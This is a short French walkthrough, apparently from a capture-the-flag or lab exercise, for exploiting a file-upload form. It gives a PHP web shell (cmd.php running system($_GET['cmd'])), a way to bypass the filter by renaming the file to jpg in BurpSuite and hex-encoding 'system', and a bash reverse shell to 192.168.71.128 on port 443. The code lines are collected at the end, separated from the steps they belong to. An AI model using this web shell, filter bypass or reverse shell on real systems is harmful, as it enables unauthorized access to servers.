Tentative d'Upload du Fichier cmd.php:
cmd.php
Essayez d'uploader le fichier cmd.php contenant :
Une erreur se produit, indiquant probablement un blocage de la fonction système.
Interception de la Requête avec BurpSuite:
Modifiez le Content-Type et le nom du fichier en "jpg".
Bypass de la Fonction Système Bloquante:
Pour contourner le blocage, convertissez la fonction système en hexadécimal :
Analyse du Code Source pour le Nom du Fichier:
Consultez le code source pour déterminer comment le fichier doit être nommé.
Envoi d'une Reverse Shell:
Utilisez la commande suivante pour envoyer une reverse shell :
Mettez-vous en écoute sur le port 443.
Mis à jour il y a 1 an
<?php system($_GET['cmd']); ?>
\x73\x79\x73\x74\x65\x6d
bash -c "bash -i >%26 /dev/tcp/192.168.71.128/443 0>%261"
